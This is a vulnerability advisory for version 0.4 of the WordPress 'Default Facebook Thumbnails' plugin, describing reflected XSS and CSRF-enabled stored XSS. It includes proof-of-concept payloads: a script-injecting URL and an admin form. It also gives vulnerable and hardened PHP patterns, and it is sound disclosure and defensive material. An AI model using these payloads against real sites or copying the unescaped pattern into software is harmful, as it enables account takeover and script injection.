WordPress Default Facebook Thumbnails plugin version 0.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
Title: WordPress 'Default Facebook Thumbnails' Plugin
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-13
Download:
- https://wordpress.org/plugins/default-facebook-thumbnail/
- https://plugins.svn.wordpress.org/default-facebook-thumbnail/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
This plugin adds an og:image tag to the page head, using the image entered or uploaded in the plugin settings.
## XSS/CSRF Vulnerabilities
==========================================================
The request URI is echoed into the HTML page without sanitization. This can be exploited with a direct link to the vulnerable file (keep in mind that most modern browsers URL-encode the payload characters).
PoC:
[URL]/wp-content/plugins/default-facebook-thumbnail/fb_thumbnail_admin.php?/"><script>alert(1)</script>
The "Upload Image or URL" field on the admin settings page is vulnerable to stored XSS. This can be exploited by combining it with the CSRF vulnerability in the same form.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=fb_thumbs">
<text>upload image: </text>
<input type="text" name="upload_image" value=""><script>alert(1)</script>"><br />
<text>fb_thumb_hidden: </text>
<input type="text" name="fb_thumb_hidden" value="Y" readonly><br />
<input type="submit">
</form>
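The two patterns described above (request URI echoed unescaped, settings saved from a cross-site POST) beside the fixes a plugin author would apply, as an added PHP example that is not the plugin's code; the fbthumb_* function and option names are hypothetical, the WordPress API calls are real:

```php
<?php
// Added illustration, not the plugin's code. fbthumb_* names are hypothetical.

// Vulnerable pattern from the advisory: request URI echoed into the page and the
// saved value echoed back, both unescaped; the save handler has no CSRF protection.
function fbthumb_render_form_vulnerable() {
    echo '<form method="POST" action="' . $_SERVER['REQUEST_URI'] . '">';            // reflected XSS
    echo '<input type="text" name="upload_image" value="' . get_option('fbthumb_image') . '">'; // stored XSS
    echo '<input type="submit"></form>';
}
function fbthumb_save_vulnerable() {
    if (isset($_POST['upload_image'])) {
        update_option('fbthumb_image', $_POST['upload_image']); // no nonce, no capability check, no sanitizing
    }
}

// Hardened version of the same settings page.
function fbthumb_render_form() {
    // Fixed action URL instead of the request URI; esc_url()/esc_attr() for attribute context.
    $action = esc_url(admin_url('admin.php?page=fb_thumbs'));
    $image  = esc_attr(get_option('fbthumb_image', ''));
    echo '<form method="POST" action="' . $action . '">';
    wp_nonce_field('fbthumb_save', 'fbthumb_nonce');   // per-user CSRF token, verified on save
    echo '<input type="text" name="upload_image" value="' . $image . '">';
    echo '<input type="submit"></form>';
}
function fbthumb_save() {
    if (!isset($_POST['upload_image'])) {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions');
    }
    check_admin_referer('fbthumb_save', 'fbthumb_nonce'); // wp_die()s on a missing or invalid nonce
    // esc_url_raw() strips disallowed schemes; additionally restrict to http(s) since only an
    // image URL makes sense for og:image.
    $url    = esc_url_raw(wp_unslash($_POST['upload_image']));
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!in_array($scheme, array('http', 'https'), true)) {
        $url = '';
    }
    update_option('fbthumb_image', $url);
}

// Output side: the stored value is escaped again where the tag is emitted.
function fbthumb_og_image() {
    $url = get_option('fbthumb_image', '');
    if ($url !== '') {
        echo '<meta property="og:image" content="' . esc_url($url) . '" />' . "\n";
    }
}
add_action('wp_head', 'fbthumb_og_image');
```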
## Solution
==========================================================
No fix available
==========================================================
XSS vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.